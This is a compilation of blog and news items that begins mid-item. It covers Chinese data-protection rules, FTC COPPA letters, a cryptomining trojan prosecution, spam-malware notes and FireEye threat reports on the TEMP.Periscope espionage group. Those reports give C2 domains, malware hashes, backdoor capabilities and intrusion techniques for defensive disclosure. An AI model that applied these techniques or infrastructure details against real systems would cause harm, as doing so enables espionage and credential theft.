  • Protection of Encrypted Networks. The networks relating to state secrets are governed by encryption protection. Networks graded at Level 3 or above must be password protected and operators must entrust relevant entities to test the security of the password application. Upon passing evaluation, the networks can run online and must be evaluated once a year. The results of the evaluation must be filed with (1) the public security authority with its filing record and (2) the cryptography management authority where the operator is located.

Powers of the Competent Authorities

In addition to regular supervision and inspection, the Draft Regulation gives the competent authorities more powerful measures to handle investigations and emergencies. During an investigation, when necessary, the competent authorities may order the operator to block information transmission, shut down the network temporarily and backup relevant data. In case of an emergency, the competent authorities may order the operator to disconnect the network and shut down servers.

Penalties for Violations

The Cybersecurity Law includes liability provisions for violations of security protection, technical maintenance, and data security and personal information protection, as well as enforcement of the Draft Regulation. The penalties include rectification orders, fines, relevant business suspension, business closing or website shut-down pending rectification, and revocation of relevant business permits and/or licenses.

Chinese Espionage Group TEMP.Periscope Targets Cambodia Ahead of July 2018 Elections and Reveals Broad Operations Globally

Introduction

FireEye has examined a range of TEMP.Periscope activity revealing extensive interest in Cambodia's politics, with active compromises of multiple Cambodian entities related to the country’s electoral system. This includes compromises of Cambodian government entities charged with overseeing the elections, as well as the targeting of opposition figures. This campaign occurs in the run up to the country’s July 29, 2018, general elections. TEMP.Periscope used the same infrastructure for a range of activity against other more traditional targets, including the defense industrial base in the United States and a chemical company based in Europe. Our previous blog post focused on the group’s targeting of engineering and maritime entities in the United States.

Overall, this activity indicates that the group maintains an extensive intrusion architecture and wide array of malicious tools, and targets a large victim set, which is in line with typical Chinese-based APT efforts. We expect this activity to provide the Chinese government with widespread visibility into Cambodian elections and government operations. Additionally, this group is clearly able to run several large-scale intrusions concurrently across a wide range of victim types.

Our analysis also strengthened our overall attribution of this group. We observed the toolsets we previously attributed to this group, their observed targets are in line with past group efforts and also highly similar to known Chinese APT efforts, and we identified an IP address originating in Hainan, China that was used to remotely access and administer a command and control (C2) server.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities (targeting is summarized in Figure 1). The group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting by Proofpoint and F-Secure on "NanHaiShu."


Figure 1: Summary of TEMP.Periscope activity

Incident Background

FireEye analyzed files on three open indexes believed to be controlled by TEMP.Periscope, which yielded insight into the group's objectives, operational tactics, and a significant amount of technical attribution/validation. These files were "open indexed" and thus accessible to anyone on the public internet. This TEMP.Periscope activity on these servers extends from at least April 2017 to the present, with the most current operations focusing on Cambodia's government and elections.

  • Two servers, chemscalere[.]com and scsnewstoday[.]com, operate as typical C2 servers and hosting sites, while the third, mlcdailynews[.]com, functions as an active SCANBOX server. The C2 servers contained both logs and malware.
  • Analysis of logs from the three servers revealed:
    • Potential actor logins from an IP address located in Hainan, China that was used to remotely access and administer the servers, and interact with malware deployed at victim organizations.
    • Malware command and control check-ins from victim organizations in the education, aviation, chemical, defense, government, maritime, and technology sectors across multiple regions. FireEye has notified all of the victims that we were able to identify.
  • The malware present on the servers included both new families (DADBOD, EVILTECH) and previously identified malware families (AIRBREAK, EVILTECH, HOMEFRY, MURKYTOP, HTRAN, and SCANBOX) .

Compromises of Cambodian Election Entities

Analysis of command and control logs on the servers revealed compromises of multiple Cambodian entities, primarily those relating to the upcoming July 2018 elections. In addition, a separate spear phishing email analyzed by FireEye indicates concurrent targeting of opposition figures within Cambodia by TEMP.Periscope.

Analysis indicated that the following Cambodian government organizations and individuals were compromised by TEMP.Periscope:

  • National Election Commission, Ministry of the Interior, Ministry of Foreign Affairs and International Cooperation, Cambodian Senate, Ministry of Economics and Finance
  • Member of Parliament representing Cambodia National Rescue Party
  • Multiple Cambodians advocating human rights and democracy who have written critically of the current ruling party
  • Two Cambodian diplomats serving overseas
  • Multiple Cambodian media entities

TEMP.Periscope sent a spear phish with AIRBREAK malware to Monovithya Kem, Deputy Director-General, Public Affairs, Cambodia National Rescue Party (CNRP), and the daughter of (imprisoned) Cambodian opposition party leader Kem Sokha (Figure 2). The decoy document purports to come from LICADHO (a non-governmental organization [NGO] in Cambodia established in 1992 to promote human rights). This sample leveraged scsnewstoday[.]com for C2.


Figure 2: Human right protection survey lure

The decoy document "Interview Questions.docx" (MD5: ba1e5b539c3ae21c756c48a8b5281b7e) is tied to AIRBREAK downloaders of the same name. The questions reference the opposition Cambodian National Rescue Party, human rights, and the election (Figure 3).


Figure 3: Interview questions decoy

Infrastructure Also Used for Operations Against Private Companies

The aforementioned malicious infrastructure was also used against private companies in Asia, Europe and North America. These companies are in a wide range of industries, including academics, aviation, chemical, maritime, and technology. A MURKYTOP sample from 2017 and data contained in a file linked to chemscalere[.]com suggest that a corporation involved in the U.S. defense industrial base (DIB) industry, possibly related to maritime research, was compromised. Many of these compromises are in line with TEMP.Periscope’s previous activity targeting maritime and defense industries. However, we also uncovered the compromise of a European chemical company with a presence in Asia, demonstrating that this group is a threat to business worldwide, particularly those with ties to Asia.

AIRBREAK Downloaders and Droppers Reveal Lure Indicators

Filenames for AIRBREAK downloaders found on the open indexed sites also suggest the ongoing targeting of interests associated with Asian geopolitics. In addition, analysis of AIRBREAK downloader sites revealed a related server that underscores TEMP.Periscope's interest in Cambodian politics.

The AIRBREAK downloaders in Table 1 redirect intended victims to the indicated sites to display a legitimate decoy document while downloading an AIRBREAK payload from one of the identified C2s. Of note, the hosting site for the legitimate documents was not compromised. An additional C2 domain, partyforumseasia[.]com, was identified as the callback for an AIRBREAK downloader referencing the Cambodian National Rescue Party.

Redirect Site (Not Malicious)

AIRBREAK Downloader

AIRBREAK C2

en.freshnewsasia.com/index.php/en/8623-2018-04-26-10-12-46.html

TOP_NEWS_Japan_to_Support_the_Election.js

(3c51c89078139337c2c92e084bb0904c) [Figure 4]

chemscalere[.]com

iric.gov.kh/LICADHO/Interview-Questions.pdf

[pdf]Interview-Questions.pdf.js

(e413b45a04bf5f812912772f4a14650f)

iric.gov.kh/LICADHO/Interview-Questions.pdf

[docx]Interview-Questions.docx.js

(cf027a4829c9364d40dcab3f14c1f6b7)

unknown

Interview_Questions.docx.js

(c8fdd2b2ddec970fa69272fdf5ee86cc)

scsnewstoday[.]com

atimes.com/article/philippines-draws-three-hard-new-lines-on-china/

Philippines-draws-three-hard-new-lines-on-china .js

(5d6ad552f1d1b5cfe99ddb0e2bb51fd7)

mlcdailynews[.]com

facebook.com/CNR.Movement/videos/190313618267633/

CNR.Movement.mp4.js

(217d40ccd91160c152e5fce0143b16ef)

Partyforumseasia[.]com

 

Table 1: AIRBREAK downloaders


Figure 4: Decoy document associated with AIRBREAK downloader file TOP_NEWS_Japan_to_Support_the_Election.js

SCANBOX Activity Gives Hints to Future Operations

The active SCANBOX server, mlcdailynews[.]com, is hosting articles related to the current Cambodian campaign and broader operations. Articles found on the server indicate targeting of those with interests in U.S.-East Asia geopolitics, Russia and NATO affairs. Victims are likely either brought to the SCANBOX server via strategic website compromise or malicious links in targeted emails with the article presented as decoy material. The articles come from open-source reporting readily available online. Figure 5 is a SCANBOX welcome page and Table 2 is a list of the articles found on the server.


Figure 5: SCANBOX welcome page

Copied Article Topic

Article Source (Not Compromised)

Leaders confident yet nervous

Khmer Times

Mahathir_ 'We want to be friendly with China

PM urges voters to support CPP for peace

CPP determined to maintain Kingdom's peace and development

Bun Chhay's wife dies at 60

Crackdown planned on boycott callers

Further floods coming to Kingdom

Kem Sokha again denied bail

PM vows to stay on as premier to quash traitors

Iran_ Don't trust Trump

Fresh News

Kim-Trump summit_ Singapore's role

Trump's North Korea summit may bring peace declaration - but at a cost

Reuters

U.S. pushes NATO to ready more forces to deter Russian threat

us-nato-russia_us-pushes-nato-to-ready-more-forces-to-deter-russian-threat

Interior Minister Sar Kheng warns of dirty tricks

Phnom Penh Post

Another player to enter market for cashless pay

Donald Trump says he has 'absolute right' to pardon himself but he's done nothing wrong - Donald Trump's America

ABC News

China-funded national road inaugurated in Cambodia

The Cambodia Daily

Kim and Trump in first summit session in Singapore

Asia Times

U.S. to suspend military exercises with South Korea, Trump says

U.S. News

Rainsy defamed the King_ Hun Sen

BREAKING NEWS

cambodia-opposition-leader-denied-bail-again-in-treason-case

Associated Press

Table 2: SCANBOX articles copied to server

TEMP.Periscope Malware Suite

Analysis of the malware inventory contained on the three servers found a classic suite of TEMP.Periscope payloads, including the signature AIRBREAK, MURKYTOP, and HOMEFRY. In addition, FireEye’s analysis identified new tools, EVILTECH and DADBOD (Table 3).

Malware

Function

Details

EVILTECH

Backdoor

  • EVILTECH is a JavaScript sample that implements a simple RAT with support for uploading, downloading, and running arbitrary JavaScript.
  • During the infection process, EVILTECH is run on the system, which then causes a redirect and possibly the download of additional malware or connection to another attacker-controlled system.

DADBOD

Credential Theft

  • DADBOD is a tool used to steal user cookies.
  • Analysis of this malware is still ongoing.

Table 3: New additions to the TEMP.Periscope malware suite

Data from Logs Strengthens Attribution to China

Our analysis of the servers and surrounding data in this latest campaign bolsters our previous assessment that TEMP.Periscope is likely Chinese in origin. Data from a control panel access log indicates that operators are based in China and are operating on computers with Chinese language settings.

A log on the server revealed IP addresses that had been used to log in to the software used to communicate with malware on victim machines. One of the IP addresses, 112.66.188.28, is located in Hainan, China. Other addresses belong to virtual private servers, but artifacts indicate that the computers used to log in all cases are configured with Chinese language settings.

Outlook and Implications

The activity uncovered here offers new insight into TEMP.Periscope’s activity. We were previously aware of this actor’s interest in maritime affairs, but this compromise gives additional indications that it will target the political system of strategically important countries. Notably, Cambodia has served as a reliable supporter of China’s South China Sea position in international forums such as ASEAN and is an important partner. While Cambodia is rated as Authoritarian by the Economist’s Democracy Index, the recent surprise upset of the ruling party in Malaysia may motivate China to closely monitor Cambodia’s July 29 elections.

The targeting of the election commission is particularly significant, given the critical role it plays in facilitating voting. There is not yet enough information to determine why the organization was compromised – simply gathering intelligence or as part of a more complex operation. Regardless, this incident is the most recent example of aggressive nation-state intelligence collection on election processes worldwide.

We expect TEMP.Periscope to continue targeting a wide range of government and military agencies, international organizations, and private industry. However focused this group may be on maritime issues, several incidents underscore their broad reach, which has included European firms doing business in Southeast Asia and the internal affairs of littoral nations. FireEye expects TEMP.Periscope will remain a virulent threat for those operating in the area for the foreseeable future.

Chinese arrest 20 in major Crypto Currency Mining scam

According to Chinese-language publication Legal Daily police in two districts of China have arrested 20 people for their roles in a major crypto currency mining operation that earned the criminals more than 15 million yuan (currently about $2M USD).

The hackers installed mining software developed by Dalian Yuping Network Technology Company ( 大连昇平网络科技有限 ) that was designed to steal three types of coins.  Digibyte Coins (DGB, currently valued at USD$0.03 each),  Siacoin (SC, currently valued at $0.01 each) and DeCred coins (DCR coins, currently valued at $59.59 each).

It is believed that these currencies were chosen for the dual reason that they are easier to mine, due to less competition, and that they are less likely to be the target of sophisticated blockchain analysis tools.

The Game Cheat Hacker

The investigation began when Tencent detected the presence of a hidden Trojan horse with silent mining capabilities built into a cheat for a popular first person shooter video game. The plug-in provided a variety of cheats for the game, including "automatic aiming", "bullet acceleration", "bullet tracking" and "item display."  
Tencent referred the case to the Wei'an Municipal Public Security Bureau, who handled the case extremely well.  As they learned more about the trojans, they identified first the social media groups and forums where the trojan was being spread, and traced the identity of the person uploading the trojaned game cheat to a criminal named Yang Mobao. Mobao participated as a forum moderator on a site called the "Tianxia Internet Bar Forum" and members who received the cheat from him there widely shared it in other forums and social media sites, including many file shares on Baidu.
Mobao was popularizing the cheat program by encouraging others to make suggestions for new functionality.  The users who were using the tool did not suspect that they were actually mining crypto-currency while using the cheat.  More than 30,000 victims were using his cheat software and secretly mining crypto-currency for him.
Yang Mobao had a strong relationship with gamers from his business of selling gaming video cards to Internet cafes.  He installed at least 5,774 cards in at least 2,465 Internet cafes across the country, preloading the firmware on the cards to perform mining.  It turns out that these cards ALSO were trojaned!  As a major customer of Dalian Yuping, Moubao was offered a split of the mining proceeds from the cards he installed, earning him more than 268,000 yuan.
Yang is described as a self-taught computer programmer who had previously worked management Internet cafes.  After experiencing some profit from the scheme above, he modified the malware embedded in some of the video cards and installed his own miner, mining the HSR coin and transferring the proceeds to a wallet he controlled.

The Video Card Maker

After Yang Mobao confessed to his crimes, the cybercrime task force sent 50 agents to Dalian, in Liaoning Province.  The Task Force learned that Dalian Yuping Network Technology had been approached by advertisers, who paid them embed advertising software on their video cards, which were then installed in 3.89 million computers, mostly high-end gaming systems installed in video cafes.  The company's owner, He Mou, and the company's Financial Controller, his wife Chen Mou, had instructed the company's head of R&D, Zhang Ning, to investigate mining software and to experiment with various mining trojans.  In addition to the illegal advertising software embedded in those 3.89 million video cards, their crypto currency mining software was embedded into 1 million additional video cards which were sold and deployed in Internet cafes across the country.
Each time one of those machines successfully mined a coin, the coin was transferred to a wallet owned by He Mou.  Chen Mou could then cash them out at any time in the future.
 16 suspects at the company were interrogated and 12 criminally detained for the crime of illegally controlling computer information systems.  Zhao was sentenced to four years himself.
(I learned of this story from CoinDesk's Wolfie Zhao, and followed up on it from the Legal Daily story he links to as well as a report in Xinhuanet, by Reporter Xy Peng and correspondent Liu Guizeng Wang Yen.) (记者 徐鹏 通讯员 刘贵增 王艳)

FTC Issues Warning Letters for Potential COPPA Violations

On April 27, 2018, the Federal Trade Commission issued two warning letters to foreign marketers of geolocation tracking devices for violations of the U.S. Children’s Online Privacy Protection Act (“COPPA”). The first letter was directed to a Chinese company, Gator Group, Ltd., that sold the “Kids GPS Gator Watch” (marketed as a child’s first cellphone); the second was sent to a Swedish company, Tinitell, Inc., marketing a child-based app that works with a mobile phone worn like a watch. Both products collect a child’s precise geolocation data, and the Gator Watch includes geofencing “safe zones.”  

Importantly, in commenting on its ability to reach foreign companies that target U.S. children, the FTC stated that “[t]he COPPA Rule applies to foreign-based websites and online services that are involved in commerce in the United States. This would include, among others, foreign-based sites or services that are directed to children in the United States, or that knowingly collect personal information from children in the United States.”

In both letters, the FTC warned that it had specifically reviewed the foreign operators’ online services and had identified potential COPPA violations (i.e., a failure to provide direct notice or obtain parental consent prior to collecting geolocation data). The FTC stated that it expected the companies to come into compliance with COPPA, including in the case of Tinitell, which had stopped marketing the watch in an effort to adhere to COPPA’s ongoing obligation to keep children’s data secure.

National Standard on Personal Information Security Goes into Effect in China

On May 1, 2018, the Information Security Technology – Personal Information Security Specification (the “Specification”) went into effect in China. The Specification is not binding and cannot be used as a direct basis for enforcement. However, enforcement agencies in China can still use the Specification as a reference or guideline in their administration and enforcement activities. For this reason, the Specification should be taken seriously as a best practice in personal data protection in China, and should be complied with where feasible.

The Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents. It includes (without limitation) basic principles for personal information security, notice and consent requirements, security measures, rights of data subjects and requirements related to internal administration and management. The Specification establishes a definition of sensitive personal information, and provides specific requirements for its collection and use.

Read our previous blog post from January 2018 for a more detailed description of the Specification.

Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries

Intrusions Focus on the Engineering and Maritime Sector

Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.

Implications

The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.

Indicators

File

Hash

Description

x.js

3fefa55daeb167931975c22df3eca20a

HOMEFRY, a 64-bit Windows password dumper/cracker

mt.exe

40528e368d323db0ac5c3f5e1efe4889

MURKYTOP, a command-line reconnaissance tool 

com4.js

a68bf5fce22e7f1d6f999b7a580ae477

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators

File

Hash

Description

green.ddd

3eb6f85ac046a96204096ab65bbd3e7e

AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

BGij

6e843ef4856336fe3ef4ed27a4c792b1

Beacon, a commercially available backdoor

msresamn.ttf

a9e7539c1ebe857bae6efceefaa9dd16

PHOTO, also reported as Derusbi

1024-aa6a121f98330df2edee6c4391df21ff43a33604

bd9e4c82bf12c4e7a58221fc52fed705

BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

China Releases National Standard on Personal Information Security

On January 25, 2018, the Standardization Administration of China published the full text of the Information Security Technology – Personal Information Security Specification (the “Specification”). The Specification will come into effect on May 1, 2018. The Specification is voluntary, but could become influential within China because it establishes benchmarks for the processing of personal information by a wide variety of entities and organizations. In effect, the Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents.

The Specification divides personal information into two categories: personal information and sensitive personal information. “Sensitive personal information” includes personal information such as financial information, identifying information (such as an ID card, social insurance card, passport or driver’s license) and biological identifying information. The Specification provides specific requirements for the collection and use of sensitive personal information, as well as a sample functional interface with a data subject which could be incorporated by an enterprise in its products or services for the collection of sensitive personal information. The sample functional interface is a template for an interactive web page or software that is designed in accordance with the Specification, shows information such as the purpose, scope and transfer of personal information, and contains a checkbox to obtain consent.

The Specification reiterates the applicability of the principles of legitimacy and minimization, and the obligation to obtain the consent of a data subject, when collecting personal information, as well as the requirement to formulate and publish a privacy policy. These appear in earlier privacy-related laws and regulations, such as the Cybersecurity Law. In addition, the Specification provides several exceptions to the consent requirement, including when the collection and use of personal information is (1) directly related to national security, public security, a matter of material public interest, the investigation or trial of a crime or the enforcement of a judgement, or (2) requested by a data subject and is necessary for the execution and performance of a contract. The Specification also includes a template privacy policy. When collecting personal information indirectly from a third party (rather than directly from the data subject), an entity must require the party providing the information to explain the source by which the personal information was originally obtained, and to check whether that party obtained the consent of the data subject for the sharing, transfer or disclosure of the personal information.

According to the Specification, personal information must be retained for only the minimum extent necessary, and must be deleted or anonymized after the expiration of the retention period. Encryption measures must be adopted whenever sensitive personal information is retained. When a personal information controller ceases to provide a product or service, it must inform the relevant data subjects and must delete or anonymize all personal information retained in relation to the data subjects.

When an enterprise uses personal information, it must adopt controls on access and restrictions on the display of the information. The use of personal information must not go beyond the purpose stated when collecting it. Personal data subjects have the right to request correction, deletion and copies of personal information that pertains to them, as well as the right to withdraw their consent to the collection and use of the personal information. An enterprise must respond to the request of a data subject for correction, deletion or copying once it has verified his or her identity.

When an enterprise engages a third party to process personal information, it must conduct a security assessment to ensure that the processor possesses sufficient security capabilities. The enterprise must also require the third party to safeguard the personal information, and must also supervise the third party’s processing of the personal information. If an enterprise needs to share or transfer personal information, it must conduct a security assessment and adopt security measures, inform the data subjects of the purpose of the sharing or transfer and of the categories of recipients, and obtain the consent of the data subjects.

An enterprise must formulate a contingency plan for security incidents that involve personal information and conduct emergency drills at least once a year. In the event of an actual data breach incident, the enterprise must inform the affected data subjects by email, letter, telephone or other reasonable and efficient method. The notice must include information such as the substance of the incident and its impact, remedial measures that have been taken or will be taken, suggestions for the data subjects on how to reduce risks, remedial measures made available to data subjects, and the responsible person and his or her contact information.

The Specification requires entities to clarify which of their departments and staff would be responsible for the protection of personal information, and to establish a system to evaluate impacts on the security of personal information. Enterprises must also implement staff training and audit the security measures which they have adopted to protect personal information.

China Publishes Second Draft of E-Commerce Law for Comment

On November 7, 2017, the Standing Committee of the National People’s Congress of China published the second draft of the E-commerce Law (the “Second Draft”) and is allowing the general public an opportunity to comment through November 26, 2017.

The Second Draft applies to e-commerce activities within the territory of China. One significant change from the first draft is that the Second Draft omits the first draft’s definition of “personal information” of e-commerce users and the detailed requirements concerning the collection and use of personal information of such users. Instead, the Second Draft would require that, when collecting and using personal information of users, e-commerce operators comply with rules established under the Cybersecurity Law of China and other relevant laws and regulations.

Pursuant to the Second Draft, e-commerce operators would be required to provide users with clear methods and procedures for accessing the users’ information, making corrections or deleting the users’ information, or closing user accounts. Also, e-commerce operators would be restricted from imposing unreasonable conditions on users when they request access, correction or deletion of information, or closure of their accounts.

The Second Draft also would require operators of e-commerce platforms to adopt measures, technological and otherwise, to protect network security, and to adopt contingency plans for cybersecurity incidents. In the event of an actual cybersecurity incident, an operator of an e-commerce platform would be required to immediately put its contingency plan into action, take remedial measures and report the incident to the relevant authorities.

China Releases Four Draft Guidelines in Relation to Cybersecurity Law

On August 31, 2017, the National Information Security Standardization Technical Committee of China published four draft voluntary guidelines (“Draft Guidelines”) in relation to the Cybersecurity Law of China. The Draft Guidelines are open for comment from the general public until October 13, 2017.

Information Security Technology – Guidelines for Cross-Border Transfer Security Assessment: Compared with the first draft published in May, the second Draft Guidelines add new definitions of certain terms, such as “domestic operations,” “cross-border data transfer” and “assessment by competent authorities.” According to these Draft Guidelines, a network operator that is not registered in China would still be deemed to be conducting “domestic operations” if it conducts business within the territory of China, or provides products or services within the territory of China. Even if the data collected by a network operator is not retained outside of China, there could still be a cross-border transfer of the data if overseas entities, institutions or individuals are able to access the data remotely. These Draft Guidelines provide separate assessment procedures for self-assessments and assessments by competent authorities. A security assessment would focus on the purpose of the proposed cross-border transfer, with reference to the legality, appropriateness and necessity of the transfer, and the security risks involved in the transfer.

Information Security Technology – General Security Requirements for Network Products and Services: This document provides both general security requirements and enhanced security requirements applicable to network products and services sold or provided within the territory of China. According to these Draft Guidelines, “network products” include computers, information terminals, basic software, system software and the like. “Network services” include cloud computing services, data processing and storage services, network communication services and the like. General security requirements under this draft include malware prevention, vulnerability management, security operating maintenance and protection of user information. Enhanced security requirements include identity verification, access controls, security audits, communication protection and certain security protection requirements.

Information Security Technology – Guide to Security Inspection and Evaluation of Critical Information Infrastructure: This document provides the procedures and substance of security inspections and evaluations of critical information infrastructure. According to these Draft Guidelines, the inspection and evaluation is divided into three methods, which include compliance inspection, technical inspection and analysis and evaluation. The key steps in a security inspection and evaluation include preparation, implementation of compliance inspection, technical inspection and analysis and evaluation, risk control and preparation of a report.

Information Security Technology – Systems of Indicators for the Assurance of the Security of Critical Information Infrastructure: This document establishes and defines indicators to be used as focal points in evaluating the security of critical information infrastructure. The indicators discussed under these Draft Guidelines include operational capacity indicator, security indicator, security monitoring indicator, emergency response indicator, etc.

China Releases Draft Guidelines on De-Identification of Personal Information

Recently, the National Information Security Standardization Technical Committee of China published a draft document entitled Information Security Technology – Guidelines for De-Identifying Personal Information (the “Draft Guidelines”). The Draft Guidelines are open for comment from the general public until October 9, 2017.

The Draft Guidelines provide a voluntary technical specification, the purpose of which is to provide guidance to data processers on the de-identification of personal information. The Draft Guidelines specify the purposes, principles and procedures for the de-identification of personal information. They also provide an introduction to common de-identification technologies, such as sampling, aggregation and cryptographical tools, and an introduction to common de-identification models, such as the K-anonymity model and the differential privacy model.

According to the Draft Guidelines, the de-identification of personal information should follow the following principles:

  • the de-identification must be in compliance with laws and regulations in relation to the protection of personal information;
  • the protection of personal information has priority over the use of the de-identified data;
  • measures should be adopted that reflect both technical and management approaches when conducting a de-identification of personal information;
  • software tools should be used; and
  • after the de-identification of personal information has been completed, regular reassessments should be adopted.

The Draft Guidelines also provide key steps for the de-identification of personal information, including isolating the identifiers using methods such as manual analysis, choosing models for the de-identification of personal information, verifying the security and usefulness of the data after its de-identification, and supervising the process of de-identification.

Multiple badness on metoristrontgui.info / 119.28.100.249

Two massive fake "Bill" spam runs seem to be under way, one claiming to be from BT and the other being more generic. Subject:       New BT BillFrom:       "BT Business" [btbusiness@bttconnect.com]Date:       Thu, August 24, 2017 6:08 pmPriority:       NormalFrom BTNew BT BillYour bill amount is: $106.84This doesn't include any amounts brought forward from any other bills.We've put your latest

Malware spam: "Voice Message Attached from 0xxxxxxxxxxx – name unavailable"

This fake voice mail message leads to malware. It comes in two slightly different versions, one with a RAR file download and the other with a ZIP. Subject:       Voice Message Attached from 001396445685 - name unavailable From:       "Voice Message" Date:       Wed, August 23, 2017 10:22 am Time: Wed, 23 Aug 2017 14:52:12 +0530 Download

Cerber spam: "please print", "images etc"

I only have a couple of samples of this spam, but I suspect it comes in many different flavours.. Subject:       imagesFrom:       "Sophia Passmore" [Sophia5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Sophia Passmore*Subject:       please printFrom:       "Roberta Pethick" [Roberta5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Roberta Pethick* In these two

Hunton Privacy Team Publishes Several Chapters in International Comparative Legal Guide to Data Protection

Recently, the fourth edition of the book, The International Comparative Legal Guide to: Data Protection 2017, was published by the Global Legal Group. Hunton & Williams’ Global Privacy and Cybersecurity lawyers prepared several chapters in the guide, including the opening chapter on “All Change for Data Protection: The European Data Protection Regulation,” co-authored by London partner Bridget Treacy and associate Anita Bapat. Several other global privacy and cybersecurity team members also prepared chapters in the guide, including David Dumont (Belgium), Claire François (France), Judy Li (China), Manuel E. Maisog (China), Wim Nauwelaerts (Belgium), Anna Pateraki (Germany), Aaron P. Simpson (United States), Adam Smith (United Kingdom) and Jenna Rode (United States).

The guide provides corporate counsel and international practitioners with a comprehensive worldwide legal analysis of the laws and regulations relating to data protection. Aaron Simpson, managing partner of the firm’s London office, and Anita Bapat, senior associate in London, served as the contributing editors of the guide.

View the relevant chapters.

First Enforcement Actions Brought Pursuant to China’s Cybersecurity Law

In the wake of China’s Cybersecurity Law going into effect on June 1, 2017, local authorities in Shantou and Chongqing have brought enforcement actions against information technology companies for violations of the Cybersecurity Law. These are, reportedly, the first enforcement actions brought pursuant to the Cybersecurity Law.

Recently, Chongqing’s municipal Public Security Bureau’s cybersecurity team identified a violation of the Cybersecurity Law during a routine inspection. A technology development company failed, as required under the Cybersecurity Law, to retain web logs relating to its users’ logins when providing internet data center services. In response, the public security authority issued a warning and an order to correct the issue within 15 days, with a follow-up inspection to take place after the rectification. In another enforcement action taken by Shantou’s municipal Public Security Bureau’s cybersecurity team in July, an information technology company in Shantou, Guangdong Province, was ordered to correct a violation of the Cybersecurity Law.

